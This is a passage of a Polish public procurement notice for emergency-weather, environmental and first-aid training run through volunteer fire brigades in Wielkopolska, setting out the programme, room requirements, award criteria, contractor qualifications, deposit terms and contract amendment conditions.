(OSP Kuchary Kościelne, OSP Wilczyn), kościański (OSP Głuchowo), leszczyński (OSP Lipno), międzychodzki (OSP Lubosz), ostrowski (OSP Czekanów), pilski (OSP Szydłowo, OSP Osiek n/Notecią), Poznań (OSP Poznań-Głuszyna), rawicki (OSP Bojanowo), słupecki (OSP Trąbczyn, OSP Wilczna), szamotulski (OSP Brodziszewo), średzki (OSP Krzykosy), turecki (OSP Głuchów), wągrowiecki (OSP Łekno), wolsztyński (OSP Przemęt), wrzesiński (OSP Lisewo), złotowski (OSP Lipka).<br/><br/>Szkolenia będą się odbywać w wybranych dniach tygodnia tj. od poniedziałku do niedzieli, w godzinach dopołudniowych lub popołudniowo – wieczornych, w zależności od możliwości czasowych uczestników projektu. W trakcie szkolenia zaplanowane są trzy przerwy: dwie przerwy 15 minutowe oraz jedna przerwa 30 minutowa.<br/>MIEJSCE REALIZACJI SZKOLENIA: <br/>Realizacja szkolenia odbędzie się w województwie wielkopolskim; na terenie powiatów ustalonych przez Wykonawcę z Zamawiającym, tak, aby uczestnikom projektu z 25 powiatów, 29 gmin projektowych województwa wielkopolskiego skrócić, jak najbardziej drogę przejazdu na szkolenie. <br/>25 powiatów, w których znajdują się OSP objęte niniejszym projektem, to powiat: chodzieski (OSP Szamocin), czarnkowsko-trzcianecki (OSP Wieleń), gnieźnieński (OSP Trzemeszno), gostyński (OSP Babkowice), grodziski (OSP Kamieniec), jarociński (OSP Jaraczewo), kaliski (OSP Blizanów, OSP Tłokinia Wielka), kępiński (OSP Słupia pod Kępnem), kolski (OSP Dąbie), koniński (OSP Kuchary Kościelne, OSP Wilczyn), kościański (OSP Głuchowo), leszczyński (OSP Lipno), międzychodzki (OSP Lubosz), ostrowski (OSP Czekanów), pilski (OSP Szydłowo, OSP Osiek n/Notecią), Poznań (OSP Poznań-Głuszyna), rawicki (OSP Bojanowo), słupecki (OSP Trąbczyn, OSP Wilczna), szamotulski (OSP Brodziszewo), średzki (OSP Krzykosy), turecki (OSP Głuchów), wągrowiecki (OSP Łekno), wolsztyński (OSP Przemęt), wrzesiński (OSP Lisewo), złotowski (OSP Lipka).<br/><br/>PROGRAM SZKOLENIA:<br/>Szkolenie obejmie tematykę z obszaru edukacji i wzorców zachowań:<br/>1)	w przypadku wystąpienia gwałtownych i katastrofalnych zjawisk pogodowych i ich skutków, w tym: rodzaje zjawisk pogodowych i ich rozpoznawanie; źródła pozyskania informacji o możliwych zagrożeniach i katastrofach; informacje na temat systemu ratownictwa, w tym roli OSP i organizacji społecznych biorących udział w akcjach ratowniczych;<br/><br/>2)	ochrony środowiskowej:<br/>•	sposoby racjonalnego korzystania z zasobów środowiskowych;<br/>•	ochrony-GOZ;<br/>•	przeciwdziałanie skutkom zmian klimatycznych.<br/>3)	6 modułów ratowniczych: RKO, AED, pediatryczny, krwotoki, pilna pomoc, stany nagłe.<br/><br/><br/>Sale szkoleniowe zapewnia Wykonawca. Zamawiający wymaga przeprowadzenia szkoleń w formie stacjonarnej. Zamawiający nie dopuszcza możliwości realizacji usługi drogą elektroniczną, chyba, że zaistnieją obiektywne przeszkody w realizacji usługi w szczególności w postaci wprowadzenia ograniczeń administracyjnych.<br/>Wymagania co do sal, które zapewni Wykonawca:<br/>1)	powierzchnia min. 40 m2 ;<br/>2)	sala z wyposażeniem w nowoczesny sprzęt techniczny i audiowizualny: projektor multimedialny, laptop oraz ekran, flipchart, flamastry lub tablice tradycyjne, sala musi mieć dostęp do internetu bezprzewodowego;<br/>3)	sala musi spełniać wymogi bezpieczeństwa, akustyczne, oświetleniowe, musi być ogrzewana (w okresie zimowym);<br/>4)	sala musi mieć dostęp do światła dziennego z możliwością zaciemnienia sali do potrzeb prezentacji multimedialnych oraz możliwość zapewnienia oświetlenia sztucznego;<br/>5)	sala musi posiadać zaplecze sanitarne;<br/>6)	sala musi posiadać stoły i krzesła dla wszystkich uczestników szkolenia oraz dla trenerów;<br/>7)	sala oraz budynek, w którym się znajduje, musi zapewniać dostęp dla osób z niepełnosprawnością ruchową (tj. dostosowanie architektoniczne dla niepełnosprawnych oraz etykiety społeczne);<br/>8)	wszystkie miejsca, w których będą odbywać się szkolenia będą odpowiednio oznakowane przez Wykonawcę (zgodnie z wymaganiami Zamawiającego);<br/>9)	w każdym miejscu, w którym będzie odbywać się szkolenie zostanie zapewniony taki sam standard sal (nie gorszy).<br/><br/>CELEM SZKOLENIA JEST:<br/>Realizacja szkoleń pozwoli mieszkańców Wielkopolski na wzrost wiedzy z zakresu zmian klimatycznych i ich skutków, ekologicznego podejścia do otoczenia środowiskowego, udzielania pomocy ratowniczej, w szczególności w nagłych przypadkach pogodowych i katastrof, przyczyniając się do zwiększenia poziomu bezpieczeństw w wielkopolskich gminach. Ponadto pozwoli na zdobycie wiedzy z zakresu: rodzajów zjawisk pogodowych i ich rozpoznawania, sposobów racjonalnego korzystania z zasobów środowiskowych, ochrony i przeciwdziałanie skutkom zmian klimatycznych, wzorców zachowań w przypadku wystąpienia gwałtownych i katastrofalnych zjawisk pogodowych i ich skutków oraz ochrony środowiskowej oraz kompetencji z 6 modułów ratowniczych: RKO, AED, pediatryczny, krwotoki, pilna pomoc, stany nagłe.<br/><br/>Wykonawca będzie zobowiązany do:<br/>1)	Sporządzenia dokumentacji:<br/>• listy obecności,<br/>• dziennika zajęć,<br/>•	protokół z przeprowadzonych testów,<br/>2) przeprowadzenie testów wiedzy przed i po prowadzeniu szkoleń;<br/><br/>Podczas prowadzenia szkoleń Wykonawca zna i wykorzystuje różne metody dydaktyczne m.in. zastosuje metody wykładowo-warsztatowe, metody szkoleniowe z wykorzystaniem technik praktycznych, IT i audiowizualnych.<br/><br/>Wysokość wynagrodzenia Wykonawcy będzie uzależniona od faktycznej liczby przeprowadzonych godzin szkoleniowych.<br/><br/>Wstępny harmonogram będzie ustalany z Wykonawcą najpóźniej w ciągu 7 dni od podpisania umowy.<br/><br/>Wykonawca będzie wykonywał swoją pracę w sposób rzetelny i terminowy, zgodnie z wymaganiami projektowymi i ustalonym harmonogramem między Zamawiającym, a Wykonawcą.<br/><br/>Szkolenia będą realizowane na podstawie przygotowanych przez Wykonawcę materiałów szkoleniowych. Materiały te muszą uwzględniać szczegółowy sposób prowadzenia szkoleń uwzględniając wymagania Zamawiającego i indywidualne potrzeby Uczestników projektu, programu, zawartości merytorycznej i sposobu prowadzenia.<br/><br/>Wykonawca na bieżąco będzie monitorować postępy w nauce. Wykonawca opracuje i przeprowadzi wśród Uczestników projektu test sprawdzający ich poziom wiedzy przed i po szkoleniach. Uczestnicy projektu otrzymają zaświadczenie o uczestnictwie w szkoleniu.<br/><br/>Wykonawca przekaże Zamawiającemu kompletną oryginalną dokumentację związaną z prowadzeniem szkolenia w terminie do 5 dni roboczych po zakończonym szkoleniu, a zeskanowane dokumenty na każde wezwanie Zamawiającego.<br/><br/>Wykonawca niezwłoczne przekazywać będzie w formie telefonicznej lub e-mail informacje o frekwencji uczestników na szkoleniu (w tym o absencji Uczestników projektu);<br/><br/>Wykonawca niezwłocznie udostępni do wglądu na żądanie Zamawiającego, Instytucji Zarządzającej oraz innym podmiotom uprawnionym do kontroli wszelkich dokumentów związanych z realizowanym szkoleniem.<br/><br/>4.	Zakres materiałów powinien odpowiadać godzinom szkoleniowym danego szkolenia/zajęć praktycznych. Wykonawca zobowiązany będzie do oznaczenia wszystkich dokumentów / materiałów związanych z realizacją Projektu zgodnie z aktualnie obowiązującymi „Zasadami promocji i oznakowania projektów” w Programie Regionalnego Funduszu Europejskiego dla Wielkopolski 2021-2027 . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <p class="mb-0">55120000-7 - Usługi hotelarskie w zakresie spotkań i konferencji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kompetencje osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia – ratowanie życia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia – prowadzenie szkoleń/kursów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Realizacja usługi w sposób przyjazny środowisku</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 6</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Realizacja usługi z uwzględnieniem aspektu społecznego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W postępowaniu mogą wziąć udział wyłącznie Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu.<br/><br/>2.	Wykonawca posiada zdolności do występowania w obrocie gospodarczym:<br/><br/>2.1. W zakresie Części nr 1:<br/><br/>Zamawiający nie określa niniejszego warunku udziału w postępowaniu.<br/><br/>2.2. W zakresie Części nr 2:<br/><br/>a)	Zamawiający wymaga aby Wykonawca posiadał status organizacji społecznej.<br/><br/>3.	Wykonawca posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/><br/>Zamawiający nie określa niniejszego warunku udziału w postępowaniu.<br/><br/>4.	Wykonawca posiada doświadczenie:<br/><br/>Zamawiający nie określa niniejszego warunku udziału w postępowaniu.<br/><br/>5.	Wykonawca dysponuje odpowiednim potencjałem technicznym.<br/><br/>Zamawiający nie określa niniejszego warunku udziału w postępowaniu.<br/><br/>6.	Wykonawca dysponuje odpowiednim potencjałem osobowym.<br/><br/>6.1. W zakresie Części nr 1: <br/>a)	Wykonawca będzie dysponował co najmniej 2 osobami, które ukończyły kurs w zakresie ratowania życia ludzkiego, które legitymują się certyfikatem ukończenia instruktorskiego kursu pierwszej pomocy obejmującego m.in. praktyczne przygotowanie w zakresie metodyki nauczania trwające min. 16 godzin;<br/>b)	Wykonawca będzie dysponował co najmniej 2 osobami posiadającymi co najmniej 2-letnie doświadczenie w zakresie ratowania życia ludzkiego;<br/>c)	Wykonawca będzie dysponował co najmniej jedna osobą posiadającą wykształcenie wyższe medyczne (np. lekarz, ratownik medyczny, pielęgniarstwo), która posiada doświadczenie z zakresu koordynacji merytorycznej min. 5 szkoleń dla co najmniej 50 osób z udzielania pierwszej pomocy, ratowania życia ludzkiego lub symulacji medycznej;<br/>d)	Wykonawca będzie dysponował co najmniej jedną osobą, która w okresie ostatnich 5 lat przed upływem terminu składania ofert przeprowadziła szkolenia/kursy z zakresu udzielania pierwszej pomocy lub ratowania życia ludzkiego w łącznym wymiarze co najmniej 40 godzin. <br/>Zamawiający dopuszcza wskazanie przez Wykonawcę tych samych osób w odniesieniu do ww. Wymogów, za wyjątkiem wymogu, o którym mowa w lit. c, w odniesieniu do którego Wykonawca powinien wskazać inną/inne osobę/osoby. W sytuacji wskazania tej samej osoby w odniesieniu do Wymogu, o którym mowa w lit. c) oraz którymś z pozostałych Wymogów Zamawiający uzna doświadczenie tej osoby tylko przy jednym Wymogu.<br/><br/>6.2. W zakresie Części nr 2:<br/>a)	Wykonawca będzie dysponował co najmniej 6 osobami, które ukończyły kurs w zakresie ratowania życia ludzkiego, które legitymują się certyfikatem ukończenia instruktorskiego kursu pierwszej pomocy obejmującego m.in. praktyczne przygotowanie w zakresie metodyki nauczania trwające min. 16 godzin;<br/>b)	Wykonawca będzie dysponował co najmniej 2 osobami posiadającymi co najmniej 2-letnie doświadczenie w zakresie ratowania życia ludzkiego;<br/>c)	Wykonawca będzie dysponował co najmniej jedna osobą posiadającą wykształcenie wyższe medyczne (np. lekarz, ratownik medyczny, pielęgniarstwo), która posiada doświadczenie z zakresu koordynacji merytorycznej min. 20 szkoleń dla co najmniej 160 osób z udzielania pierwszej pomocy, ratowania życia ludzkiego lub symulacji medycznej;<br/>d)	Wykonawca będzie dysponował co najmniej jedną osobą, która w okresie ostatnich 5 lat przed upływem terminu składania ofert przeprowadziła szkolenia/kursy z zakresu udzielania pierwszej pomocy lub ratowania życia ludzkiego w łącznym wymiarze co najmniej 120 godzin. <br/>Zamawiający dopuszcza wskazanie przez Wykonawcę tych samych osób w odniesieniu do ww. Wymogów, za wyjątkiem wymogu, o którym mowa w lit. c, w odniesieniu do którego Wykonawca powinien wskazać inną/inne osobę/osoby. W sytuacji wskazania tej samej osoby w odniesieniu do Wymogu, o którym mowa w lit. c) oraz którymś z pozostałych Wymogów Zamawiający uzna doświadczenie tej osoby tylko przy jednym Wymogu.<br/><br/>7.	Wykonawca znajduje się w sytuacji ekonomicznej lub finansowej zapewniającej wykonanie zamówienia.<br/><br/>Zamawiający nie określa niniejszego warunku udziału w postępowaniu.<br/><br/>8.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/><br/>9.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych, lub sytuacji finansowej, lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/><br/>10.	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia, Zamawiający żąda złożenia następujących dokumentów:<br/>a)	Oświadczenia składanego na podstawie art. 125 ust. 1 Ustawy, o niepodleganiu wykluczeniu składane do oferty;<br/>b)	oświadczenie Wykonawcy dotyczące przesłanek wykluczenia o których mowa w art. 7 ust. 1 u.s.r.z.p.w.a.u. Załącznik nr 7 do SWZ- - składane na wezwanie;<br/>c)	informacji z Krajowego Rejestru Karnego w zakresie:<br/>a.	art. 108 ust. 1 pkt 1 i 2 Ustawy,<br/>b.	art. 108 ust. 1 pkt 4 Ustawy dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,<br/>- sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem - składane na wezwanie;<br/>d)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2023 r. poz. 1689, z późn.zm.), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 8 do SWZ - składane na wezwanie;<br/>e)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 Ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności - składane na wezwanie;<br/>f)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 Ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności - składane na wezwanie;<br/>g)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 Ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji - składane na wezwanie;<br/>h)	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, <br/>-– Załącznik nr 9 do SWZ - składane na wezwanie;<br/><br/>i)	oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu dotyczącym przesłanek wykluczenia z art. 5k rozporządzenia 833/2014 w brzmieniu nadanym rozporządzeniem 2024/1469 oraz art. 7 ust. 1 u.s.r.z.p.w.a.u - Załącznik nr 10 do SWZ - składane na wezwanie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Każdy z Wykonawców ma obowiązek złożyć następujące oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:<br/><br/>W zakresie Części nr 1:<br/>a)	Oświadczenie o którym mowa w art. 125 ust. 1 Ustawy tj. oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez zamawiającego – według wzoru stanowiącego załącznik do SWZ (składane do oferty),<br/><br/>b)	Wykaz osób wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór wykazu osób stanowi Załącznik nr 4 do SWZ. (składane na wezwanie),<br/><br/>c)	Zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (składane do oferty o ile dotyczy),<br/><br/>d)	Oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy wspólnie ubiegający się o udzielenie (składane do oferty o ile dotyczy).<br/><br/><br/>W zakresie Części nr 2:<br/>a)	Oświadczenie o którym mowa w art. 125 ust. 1 Ustawy tj. oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez zamawiającego – według wzoru stanowiącego załącznik do SWZ (składane do oferty),<br/><br/>b)	Dokumenty potwierdzające status organizacji społecznej (składane na wezwanie),<br/><br/><br/>c)	Wykaz osób wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór wykazu osób stanowi Załącznik nr 4 do SWZ. (składane na wezwanie),<br/><br/>d)	Zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (składane do oferty o ile dotyczy),<br/><br/>e)	Oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy wspólnie ubiegający się o udzielenie (składane do oferty o ile dotyczy).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium w wysokości: <br/><br/>1)	dla Części 1 –200 zł<br/>2)	dla Części 2 – 1000zł<br/><br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Ustawy.<br/><br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r. poz. 462).<br/><br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy 67 1090 1476 0000 0001 3177 3101.<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 Ustawy, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/><br/>6.	Zwrot lub zatrzymanie wadium następuje na zasadach określonych w art. 98 Ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku gdy pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia dokonuje mocodawca lub notariusz.<br/><br/>5.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany umowy w następujących okolicznościach: <br/>a)	warunki oraz termin płatności, w szczególności w przypadku konieczności uwzględnienia okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy, jak również w przypadku gdy ze względu na interes Zamawiającego zmiana warunków oraz terminu płatności jest konieczna w zakresie niezbędnym dla dalszej należytej realizacji Umowy – w szczególności zmiana polegająca na zmianie ilości płatności częściowych, wydłużeniu lub skróceniu terminu płatności, proporcjonalnie do trwania ww. okoliczności; <br/>b)	sposób wykonania przedmiotu zamówienia, w szczególności gdy zmiana sposobu realizacji zamówienia wynika ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na wykonanie zamówienia, jak również ze względu na uzasadnione potrzeby Uczestnika Projektu, w zakresie niezbędnym dla dalszej należytej realizacji Umowy, w zakresie dostosowania Umowy do nowego brzmienia przepisów/Wytycznych; <br/>c)	zmiana terminu realizacji zamówienia, jeżeli z przyczyn organizacyjnych nie będzie możliwości przeprowadzenia szkolenia w założonym terminie, jednakże nie dłużej niż o 10 dni względem terminu pierwotnego;<br/>d)	zmiana terminu realizacji zamówienia w przypadku wystąpienia okoliczności niezależnych od Wykonawcy lub Zamawiającego, pod warunkiem, że zmiana ta wynika z okoliczności, których Wykonawca lub Zamawiający nie mogli przewidzieć na etapie publikacji dokumentów postępowania lub składania oferty i nie jest przez nich zawiniona. Termin realizacji Umowy zostanie wydłużony o czas niezbędny do eliminacji okoliczności, za które Wykonawca lub Zamawiający nie ponoszą odpowiedzialności;<br/>e)	Zmiana terminu realizacji zamówienia w przypadku wystąpienia siły wyższej, tj. zdarzenia nadzwyczajnego i zewnętrznego, na którego wystąpienie i trwania Wykonawca lub Zamawiający nie mają wpływu oraz któremu nie byli w stanie zapobiec pomimo dołożenia należytej staranności. Pojęcie siły wyższej obejmuje w szczególności takie wydarzenia jak epidemia, wojny, konflikt zbrojny, atak terrorystyczny bądź sabotażu, strajk powszechny, stan klęski żywiołowej, stan wyjątkowy, wypadek w wyniku, którego nastąpiło skażenie radioaktywne bądź chemiczne, wystąpienie ekstremalnie wysokich/niskich temperatur. W takim przypadku termin realizacji Umowy zostanie wydłużony o czas wystąpienia przypadku siły wyższej oraz usuwania jego skutków;<br/>f)	Zmiana terminu każdorazowego szkolenia z powodu braku uzbierania minimalnej liczebności grupy szkoleniowej (min. 10 osób) najpóźniej na 1 dzień przed planowanym terminem szkolenia, przy czym nowy termin zostanie ustalony nie później niż w ciągu 10 dni kalendarzowych od pierwotnie planowanego terminu;<br/>2. Zmiana osoby wskazanej przez 